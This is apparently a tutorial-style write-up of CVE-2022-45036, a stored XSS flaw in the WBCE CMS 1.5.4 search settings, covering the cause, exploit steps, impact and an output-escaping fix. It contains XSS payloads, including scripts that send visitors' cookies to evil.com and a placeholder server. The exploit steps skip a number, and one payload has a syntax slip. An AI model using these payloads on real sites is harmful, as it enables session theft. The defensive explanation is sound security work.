CVE-2022-45036 - Breaking Down the WBCE CMS v1.5.4 XSS Vulnerability in Search Settings

WBCE CMS is a popular open-source content management system, widely used for creating and managing websites. Even small vulnerabilities in such platforms can have a big impact, so it's critical for both users and developers to understand risks and patch them quickly.

In this article, we’ll take an exclusive, step-by-step look at CVE-2022-45036 — a cross-site scripting (XSS) vulnerability found in version 1.5.4 of WBCE CMS. We’ll learn how it works, how to exploit it, how to fix it, and share all the resources you’ll need. Let’s get started.

What is CVE-2022-45036?

CVE-2022-45036 is a stored XSS vulnerability found in the _Search Settings module_ of WBCE CMS v1.5.4. The bug exists because the application doesn’t properly sanitize user-supplied input in the "No Results" field. This oversight lets attackers inject and execute malicious scripts that will run in the browsers of any users who interact with the search feature.

Why is this serious?

Because attackers trick the CMS into storing a script, any visitor searching for anything that doesn't match existing content will trigger the malicious code — leading to stolen cookies, redirected users, or a compromised site.

How Does the Vulnerability Work?

When you configure the search module in WBCE CMS, you can customize what message is shown if a search returns no results. For example, admins might enter “Sorry, we found nothing.” The problem: WBCE CMS v1.5.4 did _not_ escape or sanitize the HTML or scripts input into this field.

So, an attacker with access to configure the search module (for example, via a compromised admin account) could enter this in the “No Results” field:

<script>alert('XSS by attacker');</script>

Now, whenever a user searches for something and gets no results, that malicious JavaScript will execute in their browser.

Let's walk through the exploit, step by step.

1. Login to the WBCE CMS admin panel  
Attacker needs admin or editor access to the search settings. On vulnerable systems, this could be via phishing, weak passwords, or other exploits.

3. In the “No Results” field, insert malicious payload

<script>fetch('https://evil.com/steal?cookie='; + document.cookie)</script>

This code sends the user’s cookie to an attacker-controlled server.

4. Save the settings.

5. Any site visitor who performs a search that returns no results  
The malicious script in the “No Results” message will run in their browser, stealing their session.

What Could Attackers Do?

- Steal Admin Sessions: If an admin visits the site while logged in, their session cookie could be stolen, allowing attackers to hijack accounts.
- Change Site Content: Attackers could modify site content, display defacement messages, or inject further malicious scripts.

Redirect Users: With XSS, users can be redirected to scam or phishing sites.

- Broader Network Attacks: Once inside, attackers might try to escalate privileges or pivot to other parts of the network.

Here’s a code snippet you can use in a safe lab setup (never on a live site!)

<!-- Insert this code into the "No Results" field -->
<script>
    alert('Your site is vulnerable to XSS!');
</script>

Or, to demonstrate data theft

<!-- NEVER run this on a real site! -->
<script>
    fetch('https://your-server.com/log?c='+document.cookie)
</script>

Fixing the Vulnerability

Upgrade to the latest version of WBCE CMS, as the maintainers have patched this issue in newer releases.

Here’s a hypothetical example of fixing it in PHP (not the official patch)

// Instead of echoing unsanitized user input:
echo $noResultsField;

// Sanitize output to prevent script execution:
echo htmlspecialchars($noResultsField, ENT_QUOTES, 'UTF-8');

References and More Reading

- NVD - CVE-2022-45036
- WBCE CMS Official Website
- Packet Storm Security Advisory
- OWASP XSS Prevention Cheat Sheet

Summary

CVE-2022-45036 is a classic example of why never trusting user input — even from admins — is critical in web applications. If you use WBCE CMS older than 1.5.5, update right away to close this XSS hole. Remember: even small configuration fields can become a big backdoor if not handled securely.

Stay safe, test your sites, and always keep software up to date!

Timeline

Published on: 11/25/2022 16:15:00 UTC
Last modified on: 11/28/2022 21:07:00 UTC